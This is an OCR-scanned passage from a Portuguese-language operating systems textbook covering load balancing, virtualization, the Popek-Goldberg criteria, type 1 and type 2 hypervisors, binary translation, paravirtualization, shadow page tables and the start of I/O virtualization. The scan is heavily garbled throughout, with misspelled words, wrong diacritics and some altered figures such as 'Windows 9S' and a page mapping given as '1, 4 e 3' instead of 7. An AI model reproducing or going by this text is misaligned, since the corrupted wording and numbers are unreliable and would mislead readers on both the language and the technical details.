rega o sistema nos moment os cnticos. O algoritmo inidado 
pdo emissor faz um grandę nu mero de sondagens j usta¬ 
niem e quando o sistema men os pode tolera-las — ąuando 
ele esta sobrecarregado, Com o algoritmo inidado pdo re¬ 
ceptor, ąuando o sistema esta sobrecarregado, a probabili- 


dade cle uma maąuina nao ter trabalho su Menie e peque- 
na. Contudo, ąuando for esse o caso, sera facil encontrar 
trabalho. Obviamente, ąuando ha pouco trabalho a fazer, 
o algoritmo inidado pelo receptor cria trafego consideravel 
cm razao das sondagens, uma vez que todas as maąuinas 
desempregadas caęani trabalho desespera da menie, Contu- 
do, e muito melhor ter uma sobrecarga extra ąuando o sis¬ 
tema nao esta superatarefado do que ąuando esta, 

Tambem e posswel combinar esses dois algoritmos a fim 
de que as maąuinas tentem livrar-se do trabaliio ąuando 
este for excesslvo e tentem adąuirir trabalho ąuando nao ti- 
vcrcm o suficientc. AJem disso, tahez as maąuinas consigam 
mdhorar a iiwestigaęao aleatoria mantendo um histórico 
das investigaęoes anteriores para determinar quaisqucr ma¬ 
ąuinas que estejam cronicamente sub ou sobrecarregadas. 
Uma destas pode ser iiwesrigada primdro, dependendo se o 
interessado esta temando se livrar do trabalho ou adąuiri-lo* 



Virtuafizaęao 


Em algumas skuaęóes, uma empresa possni um multi- 
computador, mas nao o quer cle verdade, Um exempIo eo- 
muni e uma empresa que possui um servidor de e-mails, 
um serndor de Internet, um servidor FTP, alguns servidores 
de eomercio ej et roni co e ouiros mais. Todos eles fimcionam 
em compumdorcs diferentes em urna mesma estante de 
eąuipamentos, conectados por uma rede de alta velocida- 
de — cm o u tras pala v ras, um rnullicomputador. Em alguns 
casos f todos esses servidores fimcionam cm maąuinas se- 
paradas porąue somentc uma rnaąuina nao darta eon la da 
carga; mas cm muitos outros casós, a principal razao para 
nao ter todos esses servięos como processos na mesma ma- 
quina e a confianęa: ogcrcnlc simplcsmcnte nao confta que 
o sistema opcraciona! va fund on ar 24 bo ras por dia, 365 
ou 366 dias porano, sem nenhuma falha, Colocando cada 
servięo cm um computador separado, se um dos servidores 
parar, os outros nao scrao a feta dos. Embora essa cscolha de 



I Figura 8,25 (a) Um nó superatarefado procurando por um nó menos carregado para o qual possa repassar processos. fb) Um nó 
v&zio procurando trabalho para fazer. 
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coma da tolerancia a falhas, ela e cara e difidi cle ser geren- 
ciada por conta do eiwoMinento de muitas inaąuinas. 

O quc fazer? A i ceno logia dc maąuinas vi nu ais, que 
icm niais de 40 a nos e normal nieme e denominada virtua- 
lizacao, fol o que surgiu como proposia de soluęao (con- 
forme discutimos na Seęao 1,7.5). Ela peronie que nm imi- 
co computador hospede mulliplas maąuinas yirtuais, ca da 
unia com sen próprio sistema operacional. A vamagem 
dessa abordagem ć que a fal ha cm uma das maąuinas vir- 
tuais na o faz com quc as outras fal hem automaticamcnte, 
Em nm sistema virtualizado, diferentes scrvidorcs podcm 
lundonar cm difercntes maąuinas yirtuais, o quc mantem 
o modele dc lal ha parciał de um muliicompuiodor a urn 
custo mu i lo mais baixo e de nmilo mais fadl maiiuLcnęao. 

Ś claro quc a organizaęao de semdores desse modo 
ć como colo car todos os ovos cm uma mes ma ccsta. Sc o 
servidor no qual as maąuinas vinuais estao armazenadas 
Jalhar, o resultado e ainda mais catastrófico do quc no caso 
de faliia de urn unico servidor. A razao para a existencia da 
vimializaęao, entreianto, e que a malaria das interrupęóes 
no servięo nao e causada por defeitos de hardware, mas 
pelo conjunto de software inchado, nao confiavel e cheio 
de enm cm especial os sistemas opcracionais, Com a icc- 
nologia dc maąuinas yirtuais, o unico software que fundo- 
na no modo nucko c o hipemsor, que tern duas ordens dc 
magnitudc, menos linhas de código quc um sistema opera- 
donal e, portanto, menos erros* 

A cxccuęaq de software nas maąuinas yirtuais apre- 
senta outras vantagens alem do forte isolamento. Uma 
delas ć quc ter menos maąuinas fisicas significa economia 
dc dinheiro em hardware e cm eletricidade c menos cs- 
paęo ocupado no escritório* Para empresas como Amazon, 
Yahoo, Microsoft ou Googie, que devcm ter milhares de 
semdores executando diferentes tarefas, a reduęao das 
necessidades fisicas em seus centros de proce ssa men to de 
da cl os re presem a uma e normę economia de custos. Nor¬ 
malnienie, cm grandes empresas, os departamentem ou 
grupos individuais tern idcias imeressames e adąuirem um 
semdor para implementa-fas, Se a ideia agradar e diversos 
outros śenddores forem neccssarios, o centro de processa- 
mento de dados da empresa aumenla. Em geral e dificil 
transferir o software entre as maąuinas porque r em geral 
cada aplicaęao predsa de uma versao diferente do sistema 
operacional com bibhotecas e arquivos de configuraęao es- 
pecfficos e outras coisas mais. Nas maąuinas yirtuais, cada 
aplicaęao pode levar consigo sen próprio ambiente. 

Outra vantagem das maąuinas virtuais e quc a criaęao 
de pontos de sahaguarda {check points) e a migraęao (por 
exemplo J para balanceamento de carga entre diferentes ser- 
yidores) sao mutro mais faceis do que no caso dos processos 
fundonando em um sistema operacional nornial. Neste ul¬ 
timo, muitas Informaęoes sobre estados criiicos de cada pro- 
cesso estao armazenadas cm labelas do sistema operacional, 
inclusive aąuelas rclacionadas a arquivos abertos, alarmes. 


gerendadores de sinais, entre outras. Na migraęao de maąui- 
nas virtuais r tudo o que precisa ser movido e sua imagem de 
memória, ja que todas as tabelas do sistema operacional sao 
nwidas tambem. 

Outro uso para as maąuinas virniais e armazenar apli- 
caęoes de versóes mais antigas de um sistema operacional 
(ou versóes do sistema operacional) que nao possuem mais 
suporte ou que nao funcionam no hardware atual. Elas 
podem funcionar ao mesmo tempo e no mesmo hardwa¬ 
re que as aplicaędes atuais. Na verdade, a possibilidade de 
executar ao mesmo tempo aplicaęoes que usam diferentes 
sistemas opera donais cum fone argumento a favor das 
maąuinas virtuais. 

As maąuinas virtuais tambem sao utilizadas no desen- 
volvimento de softvvare. Um programador que ąueira se 
certificar de quc sen programa fundoiia no Windows 9S, 
no Windows 2000, no Windows XR no Windows Vista, cm 
diferentes vcrsoes do Linux, no FrecBSD, no GpenBSD, 
no NctBSD e no Mac OS X nao precisa mais conseguir di¬ 
ferentes computadorcs e instalar um sistema operacional 
cm cada um dclcs. Em vcz disso, ele simplesfnente cria um 
grupo dc maąuinas virtuai$ cm um unico computador e 
i usta la u m sistema operacional em cada uma dessas maąui¬ 
nas. t claro ąue exisie a altemativa de particionar o disco 
rfgido e instalar um sistema operacional diferente em cada 
partięao, mas essa abordagem e mais dificil. Em primeiro 
lugar, os computadores pessoais convencionais suportam 
apenas ąuatro partlęoes primarias, independentemente do 
tamanho do disco. Segundo, embora um programa quc 
permita a seleęao do sistema operacional a ser inicializado 
possa ser instalado no bloco dc inicializaęao, seria neccssa- 
rio rcinicializar o computador para trabalhar cm um novo 
sistema operacional Com maąuinas yirtuais, todoselcs po¬ 
dem funcionar ao mesmo tempo, 

8.5.11 Requi$ito$ para virtualizaęao 

Como vimos no Capitulo 1, cxistem duas abordagens 
para a virlualizaęao. Urn lipo de hipcrvison denominado 
hipervisor tipo 1 (ou monitor de maąuina virtuai), 
ć mostrado na Figura I26|a) t Na verdade, ele e o sistema 
operacional ja que este ć o unico programa funclonan- 
do no modo nu cl o o. Sua tarefa e gerenciar multiplas có- 
pias do hardware real, denominadas maąuinas virtuais, 
como os processos qnc um sistema operacional normal 
gcrencia. Por sua vez, um hipervisor tipo 2, apresentado 
na Figura t.2ó(b) F e completamente diferente. E simples- 
mente um programa do usuario funcionando, digamos. 
no Windows ou no Linux, quc fuudona como um dnter- 
pretador' do conjunto dc instmęoes da maąuina e tam- 
bćm cria urna maąuina virtual O termo i u ter pręta doC 
esta entre aspas porąue, em geral blocos de código sao 
processados de determinada maneira, armazenados em 
ca che c esccutados diretamente dc modo a aumentar o 
desempenho, mas, em princfpio, a interpretaęao dc todas as 
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instruęoes fundonaria, embora esse procedimenio seja mais 
lento. Em ambos os casos, o sistema operadonal funcionan- 
do sobre o bipervisor e dc nom i na do sistema operadonal 
hóspede. No caso do hipervisor tipo 2, o sistema operario- 
nal fundonando sobrc o hardware e denominado sistema 
operadonal hospedeiro. 

£ impottante observar que, nas duas siiuaęoes, as ma- 
qiiitias virtuais devem se eomportar exaiamente da mes- 
ma maneira que o hardware real. Em particular, deve ser 
possivel i ni da li za das como compuiadores reais e instalar 
sistemas operadonais arbitrarios em cada urna delas r assim 
como fazemos com o hardware real. fi tarefa do hipervisor 
criar esse cenario ihtsório de forma eficienie (sem ser urn 
interpretador completo). 

A razao para a existencia de dois tipos de hipervisores 
esta rdadonada a arąmtetura do Intel 386, que foi trans- 
portada para novas CPUs durante 20 anos para que se pu- 
desse manier a compatibilidade. Em resumo, cada CPU 
com modo niideo e modo usuario possui uin coiijnnto 
dc mstruęoes quc somenie pode ser cxccutado no modo 
nucleo, como instruęoes de E/S, instruędes de modifieaęao 
nas eon figura ęoes de MMU etc. Em seus elassicos trabalhos 
sobre virtualizaęao, Popek e Goldberg {1974) ehamaram 
essas instruęoes de instruęao senstvel. Existe ainda ou- 
tro conjunto quc e captu rado por uma armadilha {/rap) sc 
executado no modo usuario. Popek e Goldberg chamaram 
essas instruęoes de instruęoes pnvilegiadas. A pesąuisa 
desses a mores foi □ primcira a dedarar que uma maąuina 
semenie pode ser vlnualizada se as instruęoes sensweis fo¬ 
rem urn subeonjunia das instruęoes prmiegiadas. De modo 
mais śimples, sc Icntarmos fazer algo que nao deveriamos 
no modo usuario, tereitios uma armad ii ha de hardware. 
0 Intel 386, ao eontrario do IBM/370, nao apresemava 
essa propriedade. Pouąmssimas instruęoes sensweis do 386 
eram ignoradas ąuando exectiiadas no modo usuario. Por 
exemplo, a instruęao PGPF substitui o registrador de esta- 
do, que aItera o bit que habilita/desabilita interrupęóes. No 
modo usuario, esse bil simpksmente nao e alterado. Em 
funęao disso, o 386 e seus sucessores nao pod i a m ser vir- 
malizados e, porta mo, nao su porta vam o hipervisor lipo I. 


Na verdade, a situaęao e um pouco piór. Alem dos pro- 
blemas com instruęoes que nao eram capturados no modo 
usuario, cxistem ainda instruęoes que leem estado sensiti- 
vo no modo usuario sem gerar uma captura, No Pentium, 
por exemplo, um programu pode determinar se vai fun- 
cionar cm modo usuario ou cm modo mklco por rncio da 
leitura dc scu sclctor de segmento dc código* Um sistema 
operadonal quc execule esse procedimento e deseubra que 
esta realnienie no modo usuario pode tomar decisoes equi- 
yocadas com base nessa informaęao. 

Esse problcma foi resolvido ąuando a Intel c a AMD 
im ro duzi ram a virtualizaęao cm suas CPUs a partir dc 
2005. Nas CPUs Intel Corc 2 Duo, cła ć cha mada dc VT 
{virtuaUzaiion technology ■—tecnologla dc virtua!izaęao). Nas 
CPUs AMD Pacific, sao chamadas de SVM {secure virtuaf 
machinę — maąuina vimial segurag A segulr, milizaremos 
o termo te etiologia de yirtualizaęao de forma generica. Am¬ 
bos foram inspirados no fundonamento do IBM VM/37G, 
mas sao um pouco diferentes. A ideia basica e criar contei- 
neres nos quais as maąuinas virtuais possani ser execuia- 
das. puando e iniciado um sistema operadonal hóspede 
cm nm contciner, ele continua sendo executado la ate que 
gerc uma cxceęao c seja capturado pclo hipcrvisor por 
mcio da cxeeuęao dc uma instruęao dc E/S, por cxempło t 
O conjunto dc operaęócs capturadas por uma armadilha 
c controlado por um mapa de bits do hardware eslabele- 
cido pdo hipervisor. Com essas extensoes, e posswel criar 
ma q u i nas vi rui ais segundo a a bo rd a gem irap-and-emulaie 
(captura e emulaęao). 

8.3.21 Hipenrisores lipo 1 

A possibilidade dc virtualizaęao e uma qucstao impor- 
tante e, portanto, dcvc ser examinada com mais detalhcs. 
Na Figura 8.26, vemos um lupervisor Lipo I gerendando 
uma maąuina virtual. Como to dos os outros htpervisores 
tipo \ r esse tambem functona em uma maąuina corwen- 
donal. A maąuina viruml funciona como um processo de 
usuario no modo usuario e, como lal, nao pode cxccuiar 
instruęoes sensweis. Ela executa um sistema operadonal 
hóspede quc aeredila estar no modo nudeo, embora, i' cla- 
ro, esteja de lato no modo usuario. Chamaremos esic de 
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I Figura 8-26 Quando o sistema operacionai em uma maguina virtual execuła oma instruęao do modo nucleo, ela e capturada pało 
hipervisor se a tecnologia de yirtLializaęao estiver presente. 
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modo nucleo virtual. A maąuina virtual tambem exe- 
cuta processos do usuario, que acreditam esiar no modo 
usuario (e realnienie estao). 

0 que acontece ąuando o sistcma operadonai (que 
acredita estar no modo nucleo) exccuia uma instruęao sen- 
sfvel (somente permitida no modo mkleo)? Em CPUs sem 
tecnologia de virmalizaęao, a instruęao falha e o sistema 
operadonai normalnienie para, o que impossibilita a viruia- 
Iizaęao real Ć possfvd argumentar que todas as itistruędes 
sensiYeis deveriam criar uma armadilha ąuando execula- 
das no modo usuario, mas nao era assim que funcionavani 
as CPUs 386 e suas sucessoras sem VT. 

Nas CPUs com VT r quando o sistcma operadonai hós- 
pede executa uma instruęao sensfvcL tem-se uma arma- 
dilha para o nucleo, conforme ilustrado na Figura 8,26. O 
hipervisor pode, entao, inspedonar a instruęao para verifi- 
car se ela veio do sistema operadonai hóspede na maąuina 
virtual ou de um programa do usuario no mesmo local. No 
primeiro caso, o hiperWsor faz com quc a instruęao seja 
executada; no segundo, cle emu la o que o hardware real 
[aria ąuaiido deparasse com unia instruęao sensfvel sendo 
executada no modo usuario, A instruęao costuma ser igno- 
rada ąuaiido a maąuina virmal nao tem VT, Caso contra- 
rio, ela e capturada para o sistema operadonai hóspede cm 
fundo na me n to na maąuina virtual. 

8.5.51 Hipenrisores tipo 2 

A constmęao dc um sistcma de maąuinas virtuais e 
rdauvamente simpies ąuando a VT esia disponfvel, mas 
o que as pessoas faziam anlcs dola? E certo que executar 
um sistema operadonai compleio ern uma maąuina vinu- 
al nao funrionaria porque algumas das instruęoes sensweis 
seriam simplesmente ignoradas, fazendo com que o siste¬ 
ma falhasse, Em vez disso, o que aconieceu foi a invenęao 
do que hoje chamamos de hipemsores tipo 2, conforme 
ilustrado na Figura 1.26 (b). O primeiro deles foi o VMware 
(Adams e Agcsen, 2006: Waldspurger, 2002), que foi o des- 
dobramento do projeto de pesąuisa Disco, realizado na Uni- 
versidade de Stanford (Bugnion et aL, 1997), O YMware 
fundona como um programa de usuario simpies em um sis¬ 
tema operadonai hospedeiro como o Windows ou o Linux. 
Quando i nicią do pela primeira vez, ele age como um novo 
computador que acaba de ser ligado e espera encontrar um 
CD-ROM na unidade correspondente, coniendo utn siste¬ 
ma operadonai quc sera instalado no disco virtual (na 
vcrdade, someme um arquivo do Windows ou do Linux) 
quando for executado o programa de insialaęao armazena- 
do no CD-ROM. Uma vcz instalado, o sistema operadonai 
hóspede pode ser imdalizado ąuando a maąuina for liga da. 

Yamos agora ver mais detalhadamente como fundo¬ 
na o YMware. Quando executa um programa binario do 
Pentium* obtido pela instalaęao do CD-ROM ou via disco 
vimial de primeiro varre o código em busca de bfocos 
basfcos, ou seja, cxecuęoes diretas de instruęoes que ier- 


minam com uma instruęao jump, cali , trap ou alguma outra 
que altere o fluxo de controie. Por definięao, um bloco ha¬ 
sko nao eontem nenhuma instruęao que altere o contador 
dc programa, exccto a ultima. O bloco e inspecionado de 
forma a averiguar se ele eontem insiruęÓes sensiyeis (con¬ 
forme propostas por Popek e Goldberg}, Em caso afirmati- 
vo f cada uma delas e substitufda por uma cha ma da a uma 
roli na YMware que a gerencia. A ultima insiruęao tambem 
e substitufda por uma chamada a uma rolina ViYiware t 

Uma vez condufdas as et a pas an teriores, o bloco basico 
e ar maże nad o no interior do YMware para quc seja cxe- 
cutado. Um bloco que nao contenha instruęoes sensfveis 
sera exeaitado no YMware com a mesma velocidade que se¬ 
ria executado diretamente pelo hardware porątie* na ver- 
dade, esti sendo executado pelo hardware. As insiruęóes 
scnsfvcis sao idenlificadas desse modo e emuladas. A cssa 
tecnica dames o nonie de traduęao binaria. 

Após o termino da execuęao do bloco basico, o contro¬ 
ie retom a ao YMware, que local iza seti sucessor, Se este ja 
liver sido trądu zido, pode ser executado i media ta me me, 
Caso contrario, dc e iraduzido, armazenado e execma- 
do. Even malmem e, a maior parte dos program as estara 
annazenada em ca che e sera executada quase que em ve- 
loddade normal. Diversas otimizaęoes sao utilizadas, por 
exemplo, se um bloco basico lermina chamando outro. A 
ultima instruęao pode ser substitufda por uma instruęao 
jump ou cali diretamente para outro bloco basico traduzi- 
do, eliminando a sobrecarga associada a busca pelo bloco 
sucessor Alem disso* nao ha necessidade de substituir as 
instruęóes senstveis nos programas do usuario, uma vez 
que o hardware ira ignora-las de quaiquer forma. 

Agora deve estar cl ara a razao para os hipemsores tipo 
2 fundona rem, mesmo em um hardware que nao possa ser 
virtualizado: todas as instruęoes sensweis sao substitufdas por 
chamadas dc rotrnas quc emulam tais instruęoes. Nenhu¬ 
ma instruęao sensiYel vinda do sistema operadonai hóspede 
e exccutada pelo hardware real. Elas sao transformadas em 
chamadas ao hipervisor, que Hca responsavel por emula-las. 

Pode-se ingenuamente imaginar que as CPUs com VT 
superam com (a ci lida de o desempenho das tecnica s de soft¬ 
ware empregadas pelos hipervisores tipo 2, mas as avalia- 
ędes mos tram resultados variados (Adams e Agesen, 2006). 
O que acontece e que a abordageni trap-and-emulate (captu- 
ra e emulaęao) utilizada pelo hardware VT gera inumeras 
armadilhas, que sao ca ras ao hardware atual, pois arruinam 
as memórias caches, TLRs e tabelas de previsao de desvios 
localizadas na CPU. Em contrapartkla, quando as instruęoes 
sensfveis sao substitufdas por chamadas de rolinas YMware 
no processo em cxecuęao* nao ha nenhuma ocorrencia dc 
sobrecarga, Conforme dcmonstram Adams c Agesen, de- 
pendendo da carga de trabalho, as vezes o software supera 
o hardware. Por conta disso, ainda que o software fundone 
bem sem a traduęao binaria, alguns hipcrvisores tipo 1 re- 
correm a ela por razóes de desempenho. 
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8-3-41 Paravirtualizacao 

Tanio o hlpemsor lipo 1 ąuanio o lipo 2 trabalharn 
ram sistcmas operacionais hóspedes na o modificados, mas 
prccisam se esforęar para alcanęar nm descmpcnho razo- 
aveh Uma abordagem difcrente que esta se tornando po¬ 
pular e a que inodifica o código-fonte do sisterna operacie- 
nal hóspede de modo que, em vez de exectitar instruęoes 
sensiveis, de faęa chamadas de hipemsor. Na verdade, 
o sisterna operacional hóspede osia atuando como urn pro- 
gra ma do usuario ąuando faz chamadas ao sisterna opc- 
radonal (o hlpemsor). Quando esse caminho e tornado, 
e preciso que o hipemsor defina uma interface composta 
por um conjunto de chamadas aos procedimentos que o 
sisterna operacional hóspede possa usar. Essc conjunto dc 
chamadas forma o que efetivamente conhecemos como 
A PI (applicatm programming interface — interface de pro- 
gra ma ęao de aplicaęóes), ainda que seja uma interface para 
uso do sisterna operadonai hóspede e nao dc pr ogra mas 
de aplicaęao. 

Indo ainda mais longe, e possfve! remover todas as 
instruęoes $ensfveis do sisterna operacional c fazer com 
quc ele semenie faęa chamadas do hipen isor para solid- 
lar servięos dc sisterna como operaęócs dc E/S. Essc pro- 
cc di men to transforma o hipemsor cm um microntkleo, 
conforme apresentado na Figura L23, Um sisterna ope¬ 
racional hóspede do qual tenliam sido intencionalmente 
removidas (algumas) instruęoes sensweis e conskkrado 
paravinuatizado (Barham et al, 2003; Whiiaker et al, 
2002). A ernuiaęao de instruęóes peculiares de hardware e 
uma tarefa desagradavel e que eonsome muito tempo. Ela 
reąuer uma chamada ao hipervisor e r em seguida, a emu- 
laęao da semantica exata dc uma instruęao complicada. E 
muito melhor quc o sisterna operacional hóspede rcalizc 
uma chamada ao hipemsor (ou microntrcleo) para que se 
rcaiizcm operaęócs dc E/S, entre outras. A razao Princi¬ 
pal para que os primeiros hipervisoresapenas enmlassem a 
maąuina completa era a falta de di$ponibi!idade de código- 
-fonte para o sisterna operadonai hóspede (para o Windows, 
por exemplo) ou ainda o grandę mimem de varianies (para 
o Linux, por exemplo). Pode ser que, no futuro, a APl hi- 
pervisor/micromicleo seja padronizada e os futuros siste- 


mas operacionais sejam projetados para chama-la em vez 
de utilizar instruęoes sensweis. Se isso acomecer, sera niais 
facil utilizar e suportar a tecnologia de maąuina virtual. 

A diferenęa entre a virtualizaęao rcal e a paravirma- 
lizaęao c apresentada na Figura S.27, Nela, teinos duas 
maąuinas virluais sendo gerenciadas em hardware VT. A 
esąuerda, temos uma versao nao modilicada do Windows 
como sisterna operacional hóspede. Quando uma instru- 
ęao sensrvel e execmada, o hardware cna uma armadilha 
para o hipemsor, que, por sua vez, emula a instruęao e 
retorna. A di rei ta, teinos uma ver$ao do Limtx modificada 
de modo a nao mais eon ter instruęoes sensweis. No lugar 
delas, ąuando e necessario exectuar operaęóes de E/S ou 
modificar registros i mer nos (como os que apomam para 
as labelas de paginas), o sisterna faz uma chamada de hi¬ 
pemsor para que o servięo seja ex ecu ta do, como um pro- 
grama aplicaiwo que realiza uma chamada dc sisterna no 
Liniix comcncional 

Na Figura 8.27, apresentamos O hipemsor dividido em 
duas partes separadas pela lin ha tracejada. Na verdade, exis- 
te somente um programa em execuęao no hardware. No 
exemplo, uma parte dele e responsavel pela interpretaęao 
das instruęoes sensweis geradas pelo Windows e intercepta- 
das. A outra parte e responsavel somente pelas chamadas ao 
hipemsor. Na figura, a segunda parte e denomitiada micro- 
mielec, Se a intenęao e que o hipemsor cxeaite somente 
sistemas operacionais hóspedes paravirtualizados, nao ha 
necessidade de etmilaęao de instruęoes sensweis e temos um 
mieronńcleo real, que simplesmente oferece servięos muito 
basicoSj como o despacho de processos e o gerendatnemo 
da MMU, A diferenęa entre um hipemsor lipo 1 e urn mi- 
cronudeo ć hoje muito vaga e iteara ainda mais confusa a 
medida que os hiptwisores comeęarem a disponibilizar mais 
e mais funcionalidades e chamadas — o que e bastante pro- 
vaveL Essc assunto c contro verso, mas esta ca da vez mais 
claro quc o programa sendo cxccutado pclo hardware no 
modo mklco na maąuina convendonai devc ser peąueno e 
conliavd e ser composto por milhares de linhas dc código, c 
nao milhóes de linhas dc código. Essc assunto foi disculido 
por dwersos pesquisadores (Hand et aL, 2005; Heiser et al. r 
2006; Hohmuth et al., 2004; Roscoe et al., 2007). 
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A paravinualizaęao do sistema operacional hóspede 
levanta unia serie de questoes. Primeiro, se as instmędes 
sensitivas sao subsritufdas por chamadas ao hipervisor, 
como o sistema operadonal pode funcionar no hardware 
nativo? Alina! dc contas, o hardware nao comprccndc es- 
sas chamadas, Scgundo, e sc existirem divcrsos hiperviso- 
res no mercado, como o YMwarc, o Xcn, de código aberto c 
originalmente da Universidade dc Cambridge, e o Viridian 
da Microsoft, todos com A Pis distintas? Como e possivel 
modiiicar o nucleo de forma a executar todos des? 

Amsden et al. (2006) propuseram unia soluęao. Em 
scu modelo, o mi dc o ć modiiicado para chamar rotinas 
espedais sempre quc for liccessario executar algo sensfyd. 
Juntos, csses proccdimcntos, diamados de VMl [virtual 
machinę interface — interface de maqmna virUial), formam 
u ma camada de baixo mvel que faz a interface com o hard¬ 
ware on hipervisoi\ Esses procedimentos sao projetados de 
forma a serem genericos e nao atrdados ao hardware ou a 
algum Lipo espedfko de hipervisor. 

A Figura 8.28 aprcscnla um exemplo dessa tecnica 
aplicado a urna vcrsao paravirtualizada do Limu denomi- 
nada VMl Limix (VMIL). Quando o VMI Linux e ex ecu la¬ 
do na maquina convencional, de precisa estar ligado a unia 
biblioteca que fornece a insiruęao (sensfvel) real necessaria 
a exeeuęao da tarefa, conforme mostra a Figura 8.28(a). 
Qnando cxecutada em um hipervisor — VMware ou Xen, 
por exemplo — o sistema operacional hóspede esta ligado a 
diferenres bibliotecas que fazem as chamadas de hipervisor 
apropriadas (e diferentes) ao hipcrvisor subjacente. Desse 
modo, o nucleo do sistema operadonal mantem a carac- 
teristica da portabilidadc, comportando-sc dc forma ami- 
gavd cm relaęao ao hipervi$or e conscrvando a dirienria, 

Outras propostas de interface de maqumas virtuais foram 
apresentadas. Uma delas, bastante popular, e a paravirt ops, 
cuja ideia e concdtualmente bastante semelhante ao que 
acabamos dc descrcver, mas com algumas cspecificidades. 

8-5.51 Virtuaiizacao de memória 

Ate aqul, falamos somente sobre como virtualizar a 
CPU. Um sistema computadonal, entretanto, possui outros 


elementos alem da CPU, como memória e dispositivos de 
E/S, que tainbem devem ser viriua3izados. Vejamos de qne 
forma isso ć feito. 

Quase todos os sistemas operacionais modern os dao 
su porte a memória virmal, que e basicameme o mapea- 
rnento das paginas no espaęo de cndcreęamcnio virtual 
para paginas da memória lisica. Esse mapeamento e dc- 
finido por tabelas de paginas (multimveis) c geralmente 
sc inicia ąuando o sisiema operacional define um registro 
de controle na CPU que aponta para a tabela de paginas do 
mvd mais alt o. A virtualizaęao complica bastante o gc- 
renciamento da memória, 

Jmaginc, por excmplo, que uma maąuina virtual es- 
tejn cm funcionamento c o sistema operacional hóspede 
cni cxecuęao nela derida mapcar as paginas virtuais 7, 4 c 
3 para as paginas ffsicas 10, 11 e 12, respectivamentc. Ele 
constrói tabelas de paginas contendo esse mapeamento e 
carrega um ponteiro de hardware que apoiue para a ta¬ 
bela de mve! mais allo. Essa insiruęao c sensfvel Em uma 
CPU virtualizada, sera capturada por uma armadilha; com 
o VMvvare, teremos uma cha mada dc rotina YMware; em 
um sistema operacional paravirmalizado, teremos uma 
cha mada de liipervisor, Para sintpl i ficar„ vamoS su por que 
seja capturada por uma armadilha em um hipemsor tipo 
i, mas o probkma c o mesmo nos tres casos anicriores. 

O quc o hipemsor faz agora? Uma soluęao possfyel e 
alocaras paginas ffsicas 10, lic 12 para cssa maquina vir- 
tual c configurar as tabelas dc paginas cxistcntcs dc forma 
quc mapeiem as paginas virtuais 1, 4 e 3 para as milizarcm. 
Ate aqui, tudo bem. 

Agora suponha que unia segunda maąuina virtual seja 
iniriada e mapeie suas paginas virtuais 4 r 5 e 6 para as pa¬ 
ginas ffsicas 10, II e 12 e confjgure o registro de controle 
para apontar para as tabelas de paginas correspondentes, 
O hipcrvisor captura a insiruęao, mas faz. o que? Ele nao 
pode utilizar esse mapeamento porąue as paginas ffsicas 
10, 11 e 12 ja estao em uso. E possfvel procurar por pa¬ 
ginas 3ivrcs — 20, 21 e 22, digamos — e utiliza-las, mas 
primciro sera necessario criar novas tabelas de paginas que 
mapeiem as paginas virtuais 4, 5 e 6 da maquina virtual 2 
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para as paginas ffsicas 20, 21 e 22. Se omra niaąuina viruial 
for iniriada e lentar utilizar as paginas ffsicas 10, I i e 12, 
sera necessario eriar um mapeamento para elas, Em geral, 
o hipervisor precisa eriar urna tabela de paginas sombra 
para ca da maquina yirtiiab A funęao dessa tabela ć mapcar 
as paginas Yirtuais utilizadas pclas inaquinas virmais nas 
paginas ffsicas alocadas pelo hipcrvisor. 

Para piorąr, toda vez que o sistema operadonal hós- 
pede modifica snas tabclas de paginas, o hipervisor tam- 
bem precisa modificar as tabclas dc paginas sombra. Sc, por 
exeinplo, o SO hóspede remapcar a pagina virUial 7 para 
o que ele considera ser a pagina lisica 200 (e nao 10), o 
hipe.rvisor precisa ser noiificado da alteraęao. O probJema e 
que o sistema operadonal hóspede pode realizar a alteraęao 
somente com u ma es er i ta na mc mór i a. Nenhuma opcraęao 
sensiYel e necessańa e r portanto, o hipervisor seqner sabe 
da modificaęao c, conscąuentcmcnlc, nao pode atualizar 
a tabela de paginas sombra utilizada pelo hardware rcal. 

Embora nao soja perfeita, inna posstvd soluęao 6 fazer 
com que o hipendsor controle a pagina na memória virtual 
do SO hóspede que contem a tabela dc paginas de nfvel 
niais alto. Essa informaęao pode ser obtida na primeira vez 
em que o hóspede lentar carregar o registru de hardwa¬ 
re responsavel por apontar para a tabela, porąue essa e 
uma instruęao sensivel e, porta nto, e capi u rada por unia 
armadilha. O hipervi$or pode eriar uma tabela de paginas 
sombra e mapcar a tabela dc paginas de mvd mais allo e 
as tabelas de paginas para as quais apoma e disponibiliza- 
las somente para leitura. Quaisqner tentativas futuras de 
modificaęao das tabelas pelo sistema operadonal hóspede 
causarao uma laka de pagina que retomara o controle a o 
hipervisor, quc, por sita vez, pode analisar o fluxo de ins- 
truęocs, descobrir o que o SO hóspede esta tentando fazer 
c atualizar a tabela de paginas sombra de aeordo. Nao e a 
melhor das soluęoes, mas e possfveL 

Esta e uma drea para a qual as futuras versóes da VT 
dcvcm disponibilizar altemativas por mcio do mapcamen- 
to dc hardware em dois mvds* Primciro, o hardware dcve 
mapcar a pagina virtual segtindo o que o hóspede acredita 
ser a pagina lisica. Em seguida, deve mapcar esse endere¬ 
ęo (considerado o endereęo vimial pelo hardware) para o 
endereęo ffsico — tudo sem necessitar de nenhuma arma¬ 
dilha. Desse modo, nenhuma tabela de paginas precisada 
ficar restrita a operaęóes de somente knura e o hipervisor 
teria de ser rcsponsdvcl somente pelo mapeamento entre 
o cspaęo dc cndcreęamcnto virtual c a memória lisica. Na 
troca dc maąuinas yirtuais, seria neccssario simplesmeme 
trocar esse mapeamento, da mesma forma que um sistema 
operadonal convencional a 1 tera o mapeamento no chavea- 
mento de processos. 

Em um sistema operadonal paravirtualizado, a sitna- 
ęao e difereme, ja que ele sabe quc dcve notificar ao hiper- 
visor a alteraęao da tabela de paginas dos processos. Con- 
seąuentemente, ele primeiro realiza todas as modilicaęóes 


necessarias para depois gerar uma cha mada de hipemsor 
informando sobre a nova tabela. Assim sendo, em vez de 
ter uma falha de proteęao a cada atualizaęao da tabela, tem- 
-se uma chaniada de hipemsor q u and o toda a atualizaęao 
tivcr sido feiia, o quc c, oln iamentc, muito mais eficiente. 

8.5.61 Virtualizaęao de E/S 

Agora quc ja falamos sobre a virtualizaęao da CPU e da 
memória, e hora de examinar a virmalizaęao da E/S. O siste- 
ma operadonal hóspede costuma conreęar pelo tesle do har- 
dwarc, com vistas a identilicar quais disposilivos dc E/S estao 
presemes. Essc tesle gera uma caplura. O que o hipemsor 
dcve fazer? Uma possibilidade e fazer com que dc retorne 
as informaęóes sobre discos, impressoras e outros dispo- 
sitnos disponweis. O hóspede carrcga os dmers ncccssa- 
